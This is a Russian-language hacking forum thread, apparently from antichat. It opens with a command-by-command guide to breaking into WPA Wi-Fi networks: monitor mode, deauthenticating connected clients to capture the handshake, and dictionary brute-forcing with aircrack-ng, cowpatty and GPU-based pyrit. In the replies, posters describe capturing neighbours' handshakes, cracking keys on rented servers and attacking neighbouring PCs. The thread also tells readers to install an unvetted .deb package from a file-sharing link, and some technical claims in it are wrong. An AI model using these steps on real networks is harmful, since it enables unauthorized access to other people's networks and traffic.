Нам необходимо:
- Дистрибутив BT3/4 (http://www.remote-exploit.org/backtrack_download.html) (USB, CD - не имеет значения)
- Адаптер, поддерживающий переход в режим монитора и пакетные инъекции. Cписок (http://aircrack-ng.org/doku.php?id=compatibility_drivers)
- Словарь для подбора. Можно посмотреть тут (http://forum.antichat.ru/thread13640.html) и тут (http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists).

1. Переводим адаптер в режим монитора

Наберите в консоли:
airmon-ng

http://img207.imageshack.us/img207/2656/72447028.png

Отобразиться список всех доступных WiFi адаптеров.
Выберите адаптер, который будете использовать.
В моем случае это wlan0 (Intel 3945 ABG).
После наберите
airmon-ng start [имя вашего адаптера]
и можем работать.

2. Выбор точки

Теперь мы будем искать точку с шифрованием WPA
airodump-ng --encrypt wpa [имя вашего адаптера]

Выбираем точку, предварительно переписав\скопипастив куда-нибудь её сетевое имя (ESSID), сетевой адрес (BSSID), и канал (CH).

3. Атака цели

Когда мы определились с целью, можно начинать атаку. Пишем
airodump-ng -w out -c [канал точки] --bssid [сетевой адрес точки] [имя вашего адаптера]
для сбора данных с точки и последующей атаки.
(-w это параметр записи пакетов в файл, т.е. имя файла вы можете выставить произвольное, если использовать указанное в данном примере, то файл на выходе будет называться out-01.cap).

Для подбора ключа нам нужен handshake (рукопожатие). Для того чтобы его “споймать”, нам либо остается ждать пока кто-нибудь не подключиться к точке и не скормит его нашему airodump'у. Но если на точке есть активный клиент, вы можете послать пакет для деавторизации клиента, что заставит его переподключиться.
Выглядеть это будет так:
http://img5.imageshack.us/img5/3685/36320712.png
Запишем куда-нибудь мак адрес клиента и откроем новую консоль, не закрывая эту.
Пишем
aireplay-ng -0 1 -a [сетевой адрес точки] -c [мак адрес клиента (Client Mac)] [имя вашего адаптера]
результат
http://img13.imageshack.us/img13/448/41428517.png

Наш клиент удачно отсоединился от точки и наверное уже отдает нам handshake ;)

Если клиентов нет, то будем использовать другой метод:
aireplay-ng -0 5 -a [сетевой адрес точки] [имя вашего адаптера]
Он не гарантирован, и не всегда срабатывает.
Это практически тот же метод, что указан выше, только на случай, если клиентов на точке нету...

Переходим в первую консоль, если airodump оповестит нас в правом верхнем углу, что у нас есть handshake, то можно приступать к следующему шагу...
Если вы не успели\не смогли\забыли увидеть оповещение, то пишем
aircrack-ng out-01.cap
если же handshake у нас, то вы увидите
http://img18.imageshack.us/img18/5776/40713833.png

4. Подбор ключа

После того, как handshake оказался у нас, можем начинать подбор.
Тут у нас есть два пути. Воспользоваться обычным методом, либо использовать программу cowpatty для генерации специального списка, что неплохо ускорит подбор.

Сначала рассмотрим первый способ.
Пишем
aircrack-ng -c out-01.cap -w [путь к словарю]
Все, подбор пошел.
http://img15.imageshack.us/img15/7403/15752463.png
Если ключ оказался в словаре, мы получим сообщение, что ключ найден.

Второй способ (CowPatty):
Создаем базу данных с помощью airolib-ng
airolib-ng wpadb init
после создайте в root текстовый файл, и вставьте туда сетевое имя точки. Назовите его "e.txt".
Теперь импортируем этот файл в базу данных
airolib-ng wpadb import ascii essid e.txt
потом импортируем словарь
airolib-ng wpadb import ascii passwd [путь к словарю]
Далее генерируем базу хешей, которые потом будут использоваться для подбора
airolib-ng wpadb batch
Это займет некоторое время. Если словарь большой, можно пойти выпить кофейку и т.д.
Когда процесс будет выполнен, экспортируем эту базу для использования в cowpatty
airolib-ng wpadb export cowpatty [сетевой имя точки] wpapmk
Теперь запускам процесс подбора.
cowpatty -s [сетевое имя точки] -d wpapmk -r out-01.cap
Опять же - если ключ был в словаре, то подбор удачен.
http://img14.imageshack.us/img14/6237/71413518.png

Ключ у вас, и вы можете использовать его по назначению.
Это все.

Доп:
В разных релизах aircrack-ng разная скорость перебора, да и функциональность растет. Рекомедую вам обновить свой aircrack-ng.
Как это сделать?

Качаем этот (http://www.mediafire.com/?9zgzftsmkxcl) файл, и сохраняем в вашу домашнюю папку (root, etc.)

Открываем консоль:
dpkg -i dpkg -i bt4_tool_updater1.0.deb
[таким образом можно устанавливать и другие .deb пакеты]

Готово. Ярлык появиться я вас на рабочем столе и/или в меню. Запускаем его, выберем первый пункт (по желанию, можно обновлять не только aircrack) и нажимаем Ok.

http://img16.imageshack.us/img16/7823/upd.png

После обновления появляется окошко "Successfully Installed". Можно пользоваться нашим новым aircrack'oм.

Использовались материалы видео Dapirates (cowpatty&airolib-ng).
Это видео можно найти в видео разделе (http://forum.antichat.ru/thread80721.html).

А в чем прикол этих двух методов!? И тот и другой по времени занимают одинаково, а вот телодвижений в CowPatty, во втором способе, намного больше!!!!
Спрашивается, когда применять второй вариант?

У меня при подборе через cowpatty, скорость в более чем в 10 раз выше. Вот тогда и думай, где применять.
Я вообще в идеале как делаю - если не париться и нужно быстро проверить точку, то просто подбор по небольшому составленному мной словарику. Там можно и обойтись обычным aircrack, но если брутить серьезно - то только cowpatty. Даже не смотря на время генерации базы, все просто меркнет в сравнении со скоростью. Еще бы хотелось попробовать подбор средствами видеокарты от ElcomSoft, но никак руки не дойдут.

у меня время генерации 22 минуты со скоростью 95 РМК/сек , и перебор по словарю так же со скоростью 95 РМК/сек ( 22 минуты) Это ноутбук :) :) :)

Но самое обидное, то !!! что если в словаре нет пароля который совпадает буква в букву 100%, VPA не взломать! Я тренеруюсь на своей точке (пока :) .....) Поставил VPA и пароль: своя фамилия англискими буквами. В словарь добавил несколько вариантов своего пароля. Взлом не проходит пока в словарь не дописать 100% пароль .

Но это невариант взлома VPA ! МАЛО ЛИ ЧТО В ГОЛОВУ ВЗБРЕДЕТ НАПИСАТЬ В ПАСС.
Так никаких словарей не наберешь. Может есть другие варианты?

Для начала WPA.
Не вариант?! Все прекрасно работает, и сложные ключи мало когда ставят, главное правильно составить словарь и иметь прямые руки. Тем более ничто не мешает хапнуть handshake, и поставить на подбор на каком-нибудь дедике.
С каких это пор при ПОДБОРЕ оно должно находить тебе пасс по аналогии? Это подбор точного значения, и это не WEP. Если не устраивает - не пользуйся.

Для начала WPA.

Не надо быть таким педантичным. Поняли друг друга и хорошо :p

Тем более ничто не мешает хапнуть handshake, и поставить на подбор на каком-нибудь дедике.

Хапнул handshake и свой, и близ лежащий. Не совсем руки кривые ;)

Все прекрасно работает, и сложные ключи мало когда ставят, главное правильно составить словарь и иметь прямые руки.

У меня ключ это моя фамилия к примеру. Ничего сложого в ключе. Хочешь handshake вышлю ;) ВЗЛОМАЕШЬ??? :)
Но не всегда знаешь кого ломаешь, и что ему в голову пришло!


С каких это пор при ПОДБОРЕ оно должно находить тебе пасс по аналогии? Это подбор точного значения, и это не WEP.

Я всеж надеялся что как то поинтелектуальнее это все решиться с WPA :mad:
А WEP уже не интересен, все вокруг переломано :eek:

Если не устраивает - не пользуйся.

Как то не по доброму писано.....терпеливее надо быть и добрее ;) Я ценю твой труд в натисании этого материала, мне могое стало понятнее,- короче ничего личного,просто я сдесь на форуме рассуждаю.
И не крутой я взломщик .... так шалю для удовольствия :D
Вот решил с WPA разобраться. Понял что это не шняга, а всеже уже защита.
А ЕСЛИ ПО ДЕЛУ: МОЖЕТ И НЕ УСТРАИВАЕТ НО ЛУЧШЕ ВЕДЬ НЕ ПРЕДРОГАЕШЬ.......ПОКА :)
готов выслушат предложение, и к диалогу!

"Предрогать" нечего. Обязательно сообщи мне, когда найдешь новую уязвимость в WPA.
Беру словарь с фамилиями, и летит твой пароль далеко, и надолго. Я же говорю - правильный словарь нужен, а не левые кейворды в нем.

to Stradi

"Предрогать" нечего.

Спасибо за граматику. не туда нажал на клавеатуре. Хотя ошибки мне, это позволительно. Живу я не в России(и не жил никогда ;) ), да и словарь с фамилиями думаю не содержит ее. ЭТО НА СЧЕТ ПРАВИЛЬНЫХ СЛОВАРЕЙ .

Хочу немного разъяснений. Сгенеривованную ( теперь каждую букву страшно писать, боюсь опять на урок граматики попасть :) ) базу хешей можно ли использовать в дальнейшем для подбора ключа WiFi точки, essid которой небыл включен (вписан) в e.txt
то есть, стала светиться позже чем был сгенерирован wpadb?

сегодня к примеру я вижу --essid Rider и --essid Toomas (я их вставил в e.txt) , а завтра начнет светиться --essid ThomsonBAD10E

Как правильно поступаать, ........ какая последовательность действий? Заново создавать e.txt,импортировать,генериро� �ать..... тогда это долго!
КАК СДЕЛАТЬ ПРОЩЕ ????

Хеш представляет из себя смесь (на сколько я понял) ESSID & пасс. Потому генерация списка и идет с ESSID. Одна база на один ESSID. Я не хешер, так что ничего сказать не могу.
В идеале - не помешало бы сделать словари на распостраненные ESSID. Но вес боюсь будет смущать... Где-то я видал top100 самых распостраненных ESSID'ов.
PS: А ошибку все равно допустил, еще не одну. Ладно, забудь. Оправдание никудышнее...

Всем привет!

Опять вопрос :) - чем база данных созданная с помощью airolib-ng отличается от WPA_PSK rainbow tables !?
И что есть лучше, или хуже?

Это (я не уверен, честно говоря), то это просто сгенерированные списки через тот же аэролиб. Только для определенных ссидов. Поковыряюсь сегодня как-нибудь, скажу конкреткретнее.

это просто сгенерированные списки через тот же аэролиб. Только для определенных ссидов.

WPA_PSK rainbow tables тоже вроде бы только для определенных ссидов.

А я что написал? О_О

Обновил...
- Добавил способ для получения хандшейка без клиентов
- Добавил мануал по легкому обновлению aircrack-ng
- Поправил кое-какие ошибки...

Первый метод.
aireplay-ng -0 1 -a [сетевой адрес точки] -c [мак адрес клиента (Client Mac)] [имя вашего адаптера]

Если клиентов нет, то будем использовать второй метод:
aireplay-ng -0 5 -a [сетевой адрес точки] [имя вашего адаптера]

Он не гарантирован, и не всегда срабатывает.
Это практически тот же метод, что указан выше, только на случай, если клиентов на точке нету...



По моему это бред. Из уважения, даже попробывал, так сказать второй метод,..... но он не срабатывает. С кем это произойдет "рукопожатие" если НИКОГО нет, если клиентов на точке нету... :eek: ?? С нами, пиратами, что-ли точка обменяется "ключами". ?Причем там четырехсторонний как бы обмен происходит

Второй вариан о котором ты пишешь, это когда на точке всего один клиент!

Первый вариант используют когда на АР несколько клиентов, а отрываем одного конкретного клиента.
Деаунтефикационный пакет шлется напрямую с нашего компа на компьютер клиента, и к нему надо находиться достаточно близко,- поэтому и применяем отрыв ( деаунтефикацию) конкретного клиента. Ведь они могут находиться все на разных расстояниях от нас. И так по очереди ( если их несколько), пока не поймаем handshake

Рекомедую вам обновить свой aircrack-ng.
Как это сделать?

Качаем этот (http://www.mediafire.com/?9zgzftsmkxcl) файл, и сохраняем в вашу домашнюю папку (root, etc.)



ссылочка по обновлению aircrack-ng
не понятная ?

Вариант о котором я пишу прекрасно работает, проверил, перед тем как выложил.
Сработало на одной точке из 3. Я понятия не имею, каким образом точка отдает нам handshake, кто даст почитать - отплюсую, ибо не я создавал инъекцию =\
Смотри ВНИМАТЕЛЬНО http://rapidshare.com/files/218589700/WPA_NO_CLIENTS.flv.html [thx to _SEREGA_] или гугли wpa no clients. Посмотрел? Молодец, возьми с полки пирожок и не задавай больше глупых вопросов.
Первый способ может использоваться не только, если на точке 2 или больше клиентов. Все прекрасно работает, если клиент один.
Второй вопрос вообще не смог понять\прочитать.
Твой пост состоит чуть более, нем на половину из бреда. Будь любезен, пиши внятно...

Хотелось бы услышать коментарии других форумчан.
А то как то у нас с тобой Stradi диалог получается....

ГДЕ МНЕНИЯ СООБЩЕСТВА!?!?!?!

Первый и второй способы деаутентификации отличаются, как правильно заметил Zonanet, лиш адресацией - первый - адресный, второй - широковещательный. Каким образом посылка пяти широковещательных пакетов может помочь получить хэндшейк - х/з. Склоняюсь к тому, что если и поможет, то это всего-лишь совпадение....
Пойду доки почитаю - самому надо.

Но если легитимных клиентов действительно нет, то никакие инъекции хэндшейк не подарят - факт!

На счет шировещательного - это и так понятно. Но вот способ не отличаеться - после запуска пишеться, что-то вроде "эта атака лучше работает, когда имеет клиента". Т.е. если подставить мак клиента - эффект что от первой, что от второй атаки одинаковый. В доках кроме первой атаки ничего нету... Может этот "выброс" расчитан на тех клиентов, которые не в "зоне доступа"? Ибо как раз на такой точке у меня и сработал метод (на точке хорошая дата генерилась, но клиентов не видно). Если гуглить - ничего конкретного нету.

а вот мне непонятно следующее моменты:
- как быть, когда SSID "скрыт" ? т.е. в настройках ТД стоит галка "скрыть точку доступа"?

- причем тут handshake ? он же создается тогда, когда ключи, пароли совпадаются !?
в данном ситации если получаем "рукопожатие", то смысл брутить уже WPA ?
как то не понятно этот момент..

а вот мне непонятно следующее моменты:
- как быть, когда SSID "скрыт" ? т.е. в настройках ТД стоит галка "скрыть точку доступа"?

- причем тут handshake ? он же создается тогда, когда ключи, пароли совпадаются !?
в данном ситации если получаем "рукопожатие", то смысл брутить уже WPA ?
как то не понятно этот момент..


1 И что что скрыт? это значит что пакеты-маячки не генерирует ТД. А airdump и kismet на это пох. т.к. они вычисляют SSID на ответах клиетов. SSID содержится в заголовке пакета.

2

handshake это пойманый ARP пакет в котором хэшированый пассворд!

... Может этот "выброс" расчитан на тех клиентов, которые не в "зоне доступа"? Ибо как раз на такой точке у меня и сработал метод (на точке хорошая дата генерилась, но клиентов не видно). Если гуглить - ничего конкретного нету.

Если клиент не в зоне доступа, то как на точке, может хорошая "дата генерится"?? :D БРЕД!!!

ПОВТОРЮСЬ: Деаунтефикационный пакет шлется напрямую с нашего компа на компьютер клиента, и к нему надо находиться достаточно близко чтобы получить handshake.

Если клиент не в зоне доступа, то как на точке, может хорошая "дата генерится"?? :D БРЕД!!!

ПОВТОРЮСЬ: Деаунтефикационный пакет шлется напрямую с нашего компа на компьютер клиента, и к нему надо находиться достаточно близко чтобы получить handshake.
Cлушай, поменьше используй слово "бред" в ненужных местах.
В аиродампе отображаються клиенты, которые видит адаптер, а те, до котрых не хватает сигнала - нет, понимаешь? Такие ссиды можно увидеть, используя wifizoo, зайдя в схему клиентов. Там же отображаеться уровень сигнала. Так вот, клиент скорее всего находиться вне зоны моего адаптера, но подключен к точке, и генерирует дату. Таким образом посылая пакеты широковещательно, есть шанс что он долетит до клиента (только не говори, что у тебя ни разу не бывало, что на сканере иногда появляються точки, к которым нельзя законнектиться, ибо сигнал очень слаб, а большая часть пакетов - лосты).

_SEREGA_
+
спасибо. давай еще раз повторим:
1. Я раньше работал net stumbler, и там не определился. (под windows)
airdump и kismet уже видят, да? то есть NIX очередной раз тру :)

2. получается, что я могу на улице с ноутом украсть handshake пакет и потом дома спокойно брутить? я думал, что так только WEP можно брутить )))
P.S. все таки не понимаю логику перемешения в каждом пакете пакеты "рукопожатия". Не достаточно ли и бесопасно только во время аутентификации сделать запрос ответ и все ?

_SEREGA_
+
спасибо. давай еще раз повторим:
1. Я раньше работал net stumbler, и там не определился. (под windows)
airdump и kismet уже видят, да? то есть NIX очередной раз тру :)

2. получается, что я могу на улице с ноутом украсть handshake пакет и потом дома спокойно брутить? я думал, что так только WEP можно брутить )))
P.S. все таки не понимаю логику перемешения в каждом пакете пакеты "рукопожатия". Не достаточно ли и бесопасно только во время аутентификации сделать запрос ответ и все ?
Нет стамблер это просто сканер, а чтобы собирать пакеты, нужно перевести адаптер в режим монитора (пока это сделаешь под виндой, можно немного свихнуться). Скрытые точки и так видны, просто у них длина 0, но аиродамп, кисмет и прочие палят ссид, когда к точке кто-нибудь подключается.
Да, можешь - только нужно (в основном, см. наши пререкания) чтобы там был клиент - ты посылаешь ему деавторизацию, и при пересоединении забираешь хэндшейк и подбираешь ключ где хочешь. В веп немного другая система - там ключ не брутиться, хотя брутить тоже можно. (но не нужно)
Рукопожатие как раз передается во время авторизации на точке, в этом и проблема...

Stradi
+
вот оно как значит.
ты посылаешь ему деавторизацию, и при пересоединении забираешь хэндшейк и подбираешь ключ где хочешь.
а каким образом "взломщик" может нарушить уже сушествующий канал , чтоб клиент переподключился? я не говорю, что это не возможно, просто инетересно.
И как выглядет перехваченный WPA (handshake) пакет? он как MD5 хэш ? брутить можно через passwords pro как обычные бруты?
если есть возможность, покажите кто небуть содержание перехваченых данных.

Имеено. На первой странице я об этом и писал :)
Хеш, правда точно не знаю, там спецефический. Либо из словаря генерируеться на ходу aircrack-ng, либо предварительно сгенерировать хеши (скорость возростает) (cowpatty).

Stradi
+
вот оно как значит.

а каким образом "взломщик" может нарушить уже сушествующий канал , чтоб клиент переподключился? я не говорю, что это не возможно, просто инетересно.
И как выглядет перехваченный WPA (handshake) пакет? он как MD5 хэш ? брутить можно через passwords pro как обычные бруты?
если есть возможность, покажите кто небуть содержание перехваченых данных.

Ну я же сказал он называется ARP пакет, он посылается от клиента тогда, када клиент подрубается. вот тут подробней про этот пакет (если че поймёш =) http://ru.wikipedia.org/wiki/ARP

так вот если бы там был бы хэш типа MD5 который ломался на Password Pro то было бы счастье, там хоть скорость брута приличная! а в aircrack медлееная и токо по словарю,а там и прямым перебором!

Есть такие новые идеи брутить на видяхе =) у видяхи GPU для таких вычислений лучше! скорость брута во много раз лучше! вот когда будет нормальное железо тогда и можно пробовать ломать!

Короче качай backtrack 4 beta http://www.remote-exploit.org/backtrack_download.html
с windows для этого дела лучше не связывайся! т.к. не умеют делать под это говно дрова!
запускай kismet и смотри чё у тя в округе твориться=)
читай маны и пробуй!

_SEREGA_, не гони - АРП к ВПА-хэндшейку вообще никакого отношения не имеет - не путай людей. Реплей АРП юзают чтоб нагнать трафик для сбора инициализационных векторов.
На счет ГПУ - так не идеи, а реализации уже есть - pyrit.

Возвращаясь к теме широковещательных деаутентификационных пакетов - я чего думаю. Я думаю, что есть нюанс, который мы возможно не знаем. Например, при аутентификации карточки некоторых производителей повышают мощность на максимум. Вот и получается, что близкий к ТД клиент работает на минимальной мощности, и его не видно, но получив деаутентификацию, поднимает мощность до предела, и мы ловим хендшейк. Ну и еще вариант - деаутентификация может заставлять переконнекчиватся клиентов с нестабильным коннектом - у меня дома такая фишка канает.

_SEREGA_

хмм, мне кажется trottle прав насчет
АРП к ВПА-хэндшейку вообще никакого отношения не имеет
ибо по ARP протоколу передается ARP-запрос и в ответ ARP-ответ..
короче хз.. сам не уверен точно, по этому на 100% немогу подтвердить

http://sgordey.blogspot.com/2008/11/wpa.html o_O
Кто-нибудь знает об этом что-нибудь хорошее?

|||

А вот тут подробно про handshake http://en.wikipedia.org/wiki/802.11i#The_Four-Way_Handshake
Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key).
Иными словами - хендшейк, это и есть пакет, в котором содержится PTK (поправьте, если ошибаюсь). Арп тут не причем. И как написано там же, PTK содержит "PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address and STA MAC address". После вся эта куча шифруется в спецефический хеш.
aircrack и cowpatty делают тоже, только вместо PMK подставляют значение из словаря, добавляют в хеш всю дребедень, и после сравнивают результат.
"PMK – обновляемый симметричный ключ, владение которым означает разрешение (авторизацию) на доступ к среде передачи данных в течение данной сессии. PMK создается на основе MK. Для каждой пары STA и AP в каждой сессии создается новый PMK."
Вот и ответ - таким образом, PMK и есть наш ключ.
Посылая, пакет деавторизации мы разрываем эту сессию, и после обмена создается новый PMK (т.е. мы забираем хендшейк).

Я был не прав,НО я не думаю что это пакет называется "wpa handshake"

насчёт ARP я думал что там handshake потому что он первый посылается при коннекте клиента к ТД. Но я точно знаю что протокол по которому wpa handshake передаётся назывется EAP http://en.wikipedia.org/wiki/Extensible_Authentication_Protocol

и называется он (пакет) коректно я думаю EAP packet. По крайней мере так его называют на форуме backtack 'a


На счет ГПУ - так не идеи, а реализации уже есть - pyrit.

я это и имел ввиду.Смотрю ты токо к словам умеешь придираться!

так-так... сколько начинаю глубше смотреть - столько много непонятки вижу :)
вот например:
Для каждой пары STA и AP в каждой сессии создается новый PMK.
Посылая, пакет деавторизации мы разрываем эту сессию, и после обмена создается новый PMK (т.е. мы забираем хендшейк).
получается каждый раз новый хендшейк ? или хендшейк это не PMK ?

Первое - имелось ввиду, что при каждом новом контакте (разные маки, адаптеры) создаеться хандшейк, в котором есть PMK.
На счет второго - тут еще проще, имелось ввиду что при реконнекте, они еще раз обмениваються пакетами, с хандшейком, с PMK. Практически тоже самое :) Кстати, хеши каждый раз отличаються, из-за каких-то изменений (я в это сильно не вникал), но все эти данные есть в пакетах, поэтому когда мы заберем два разных хандшейка от одной, и той же точки - хеш будет отличаться, но смысл останеться тот же (этим занимаються всякие cowpatty и aircrack'и).
В общем - тут принцип кукисов, только мы можем эти куки "порвать" и после реконнекта сдампить их себе, после использовать в своих целях.

Есть несколько моментов, на 2 пункта, излагаю :)
1. Скрытая точка доступа бывает 2х типов где essid скрывается полностью тогода пишется его длина=0, и неполностью, тогда длина essid выводится в kismet или airodump-ng. Добыть essid можно или брутом по словарю или поймав пакет клиента в сети. Но вы это и так знаете.
2. По написано в начале темы. Иногда airmong-ng не переводит карту в монитор мод, для этого можно использовать такую команду , как альтернативную:
# ifconfig <интерфейс> down && iwconfig <интерфейс> mode monitor && ifconfig <интерфейс> up

По поводу брута WPA , неблагодарное это дело да и вообще брут - гадость, скорее бы в протоколе нашли уязвимость, как было в своё время с wep

По поводу брута WPA , неблагодарное это дело да и вообще брут - гадость, скорее бы в протоколе нашли уязвимость, как было в своё время с wep

согласен! уже скоко лет существует wpa и не могут найти уязвимость нормальную!!! токо вот что нашли в wpa(tkip) http://www.securitylab.ru/opinion/362638.php но это пока ерунда!

Почитал форум, но нигде не встретил ответа на вопрос, который у меня возник.
А именно, можно ли каким-нибудь ключом указать aircrack-ng сколько процессоров использовать?
Столкнулся с ситуацией сегодня, подбирал пароль на двухпроцессорном серваке с четырьмя ядрами на процессор, так он тока одно ядро использовал, а остальные, видимо, не видел...
Есть мысли по этому поводу?

Вообще то от проги это не зависит, а зависит от ос как она расспаралеливает процесс на smp системах.

Смотрю ты токо к словам умеешь придираться!
Ну, ты же толком не написал, я и придрался. Написал бы внятно - вопросов бы не было.

Pyrit, кому интересно - штука злая. Не знаю, как там на рэд хатах и прочих rpm-based дистрибутивах (для них есть прекомпилированые пакеты), а у меня на кубунте 64-битной (равно как и на всех дебианах, скорее всего) с компиляцией пришлось повозиться. Основных засад было 2:
1. Под 64-битные линухи нет (неделю назад не было) релизного драйвера с поддержкой CUDA 2.2, а pyrit из свн-ов был к тому моменту уже версии 0.2.3, и требовал именно 2.2 КУДУ. Не сразу я это заметил, пришлось откатиться на пирит 0.2.2.
2. Пирит надо было собирать компилятором 4.1, а дефолтный в системе был 4.3, и ни в какую не переопределялся.

Когда все победил, получил такой результат:

а@Workstation:~$ pyrit benchmark
Pyrit 0.2.2 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...

Running benchmark for at least 60 seconds...

CUDA-Device #1 'GeForce 9800 GT': 5832.27 PMKs/s, 94.71% occupancy
CPU-Core (x86_64): 204.67 PMKs/s, 99.04% occupancy

Benchmark done. 6036.94 PMKs/s total.
Т.е. разница в обсчете между процом и видухой - в ~28 раз.

Но, во-первых, пирит не подбирает пароли, а только рассчитывает хэши, которые потом надо скормить cowpatty или aircrack'у, и во-вторых, чета капризничает с вордлистом.
Для ковпатти он файлик выдает ну очень шустро, но (опять "но") ковпатти не любые хендшейки перебирать умеет. А в БД для аиркрэка он у меня выгонял 20 млн хэшей чуть ли не 12 часов. Все равно по итогу быстрее, чем все на проце считать, но неприятно как-то.

И вот со словарем теперь разобраться не могу - первый подвернувшийся на 20 млн он схавал и не подавился - класс, думаю, наберу ща словарей, и скормлю ему все. Ага, чичас - взял словари с инсайдпро, слил в один файл, обрезал лишнее, скормил пириту - не хочет, сволочь, больше 40к слов обсчитывать. Запускаю батч - 40к и расчет останавливается. Причем, сам он не вываливается в командную строку, а работает, но 40к как было, так и не меняется, счетчик времени при этом исправно тикает. У меня ощущение, что ему какие-то слова в словаре не нравятся, но это только догадки, и где искать потверждение - ума не приложу...

Ага, ну и еще нюанс - пирит для аиркрэка выдавать результат умеет только в БД. А аиркрэк, поставленный у меня из репозитория имел версию rc1, и БД работать не хотел, так что его тоже пришлось сносить и собирать из СВНов.


Столкнулся с ситуацией сегодня, подбирал пароль на двухпроцессорном серваке с четырьмя ядрами на процессор, так он тока одно ядро использовал, а остальные, видимо, не видел...
Есть мысли по этому поводу?
Есть - почитать справку, погуглить, на офсайт зайти - там форум замечательный. Да хотя-бы просто прогу запустить без ключей - она сама скажет:
Common options:

-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-p <nbcpu> : # of CPU to use (default: all CPUs)
-q : enable quiet mode (no status output)
-C <macs> : merge the given APs to a virtual one
-l <file> : write key to file

2trottle
Спс!
У меня почему-то по умолчанию иолько один использовался процессор.
а с -р 8 - все загрузились на 100% и выдало 2440 k/s!!!
Спасибо за помощь!

evgenst, между прочим, по предварительно рассчитанным хэшам у меня аиркрак на коре2дуо 2 Ггц перебирал порядка 18к/сек. Т.е. все ~20 млн вариантов он перебрал за ~20 минут. А у тебя, наверное, раз в 12 быстрее работал бы.
А предварительный расчет хэшей можно сделать на любой другой тачке с приличной видухой.

2trottle
А я еще не совсем разобрался, как запустить генерацию хэшей на видюхе((
Вчера пытался на маке - ниче не получилось((
А в бактрак Пирит не встроен случайно?
Просто нет щас возможности его заюзать, чтоб проверить...

В БТ4бэта вроде есть уже.
Я БТ4 не юзал, т.к. он у меня на еее не хочет иксы стартовать. Без иксов мне кисло, а разбираться пока времени нету. А на десктопе у меня кубунта, я просто доставляю чего надо, и все.

Кстати, вчера провел эксперимент и пришел к выводу, что под Вендой аиркрэк шустрее перебирает пассворды: на ноуте венда выдавала 320 k/s, а БакТрак3 на том же ноуте выдал всего 230 k/sec, с тем же cap файлом и словарем соответственно...

Только версии aircrack'а разные - потому и скорость отличаеться. Вот обнови до последней на бт, и увидишь разницу. Товарисч Zonanet уже проверял.
Вывод - обновляйте софт...

Смысл его обновлять на компашке ЛайвСД...
Хотя, даже на USB версии никакие изменения не сохраняются после перезагрузки...

Что мешает его установить? Использовав тот же самый инсталлер. (Есть такой, неоффициальный). Лучше руками конечно, и бт4.

А есть ссылка на адекватную инструкцию?

Адын (Инсталлер) - http://forums.remote-exploit.org/showthread.php?t=20795
Два (Дуалбут с виндой) - http://forums.remote-exploit.org/showthread.php?t=20140
Сам по второму несколько раз ставил.
Вообще, хочу заняться большим мануалом по бт, что-то вроде "FAQ по BT для вардрайвера" xD

Насчет полного FAQ по BT - это очень хорошая мысль...
Но, не только описание части, относящейся к вардрайвингу, но и вцелом по BT.
Там же полно действительно достойных инструментов!

Я и не спорю - но думаю описывать метасплойты ипр не нужно, есть факи и так на ачате по нему, да и вардрайверу он мало зачем нужен. Разве что, после того как залез в сеть сплоиты на соседних пк проверять xD Затронуть ветку с беспроводными сетями, и еще кое-чего... Вообще, я думаю многих будет интересно создание фейковой точки... (С "карточной" (логин и пасс) авторизацией)

Дак вардрайверские факи тоже тута есть. Ну, не факи, может, но айркрак достаточно детально описан.

Не знаю, может не совсем в ту тему, но тут просто начали про пирит... Короче, такое дело:
There is a bug in 0.2.2 regarding Null-bytes in imported passwords that causes Pyrit’s blobspace to get corrupted. Fixing this bug requires a slight change in the binary format of the blobspace.
Т.е. в версии 0.2.2 есть баг, из-за которого при импорте паролей, содержащих "Null-bytes", рушится база пирита. Думаю, из-за этого оно у меня на 40к и останавливалось - у меня пароли были с символами национальных алфавитов.
Т.е. надо использовать пирит версии 0.2.3, но он требует CUDA 2.2, которая доступна сейчас только девелоперам.
Теперь вопрос - где взять КУДУ 2.2?
И что такое Null-bytes?

P.S. Еще один не вполне очевидный вывод - пирит в БТ4 тоже с этим багом. Почти наверняка.

Null bytes, это Null bytes. Нулевые байты. Можешь отрыть любой документ в хекс-редакторе, и набрать вместо содержимого нулей в значениях. Это будет нулевые байты.
Дальше - если версия доступна только девелоперам... то наверное её можно взять нигде.
Скорее всего баг действительно там есть, ибо бт был выпущен скорее всего раньше, чем обнаружили багу. Либо её пофиксили, как сказано в описании проблемы.

Null bytes, это Null bytes. Нулевые байты.
Ну, кагбе, я понял, что ты хотел сказать - это символ с ASCII-кодом 00. Примерно так и думал. Тогда вопрос - какой прогой можно причесать вордлист? Так, чтоб все комбинации с неподходящими символами вырезать нафик?

Дальше - если версия доступна только девелоперам... то наверное её можно взять нигде.
Ее можно взять у девелоперов - собственно, об этом и был вопрос. Зарегаться на сайте нвидии как девелопер можно свободно, но насколько я понял, регистрация аппрувится не роботом, а человеком. Поэтому и вопрос возник - может есть зареганые девелоперы? Под куду сейчас наверное только ленивый не кодит. :)

Скорее всего баг действительно там есть, ибо бт был выпущен скорее всего раньше, чем обнаружили багу. Либо её пофиксили, как сказано в описании проблемы.
Ну, я сделал такой эксперимент - пирит собрал из СВН, 93 редакция, кажется - это самое начало ветки 0.2.3, как раз только пофиксили тот баг нуль-байтами, а модуль работы с кудой собрал из предыдущей редакции, и версия у него, соответственно, 0.2.2. Так вот, пирит узрел и согласился нормально работать с модулем куды предыдущей версии, но пароли дальше 40к все равно не перебирает...

Эксперименты продолжаются...

P.S. Тут, наверное, уместно напомнить - проблемы только со словарями с национальными символами - сугубо англоязычные словари работают нормально.

Мм, а кодировка "национальная" в системе установленно корректно? И тем более, где ты видел точку, в которой используеться пароль с нац. символами, а не латиницей? о_О
Может и можно, но я не пробовал. Поправь, если ошибаюсь...

Мм, а кодировка "национальная" в системе установленно корректно?
Ага. Там из коробки корректно.
И тем более, где ты видел точку, в которой используеться пароль с нац. символами, а не латиницей?
Я не видел, но это ведь не значит, что нельзя. Точка-то не символами оперирует, а битами. Ну будет в байте первый бит не 0 а 1 - и что? Теоретически, это не должно ничему помешать. А если юникод - ну, два байта будет, все равно из нулей и единиц состоят. Лишнее отбросит, остальное обработает. Теоретически, ага.
Может и можно, но я не пробовал. Поправь, если ошибаюсь...
И я не пробовал. Но ты не ошибаешься. Сегодня решил развеять для себя эти смутные сомнения.
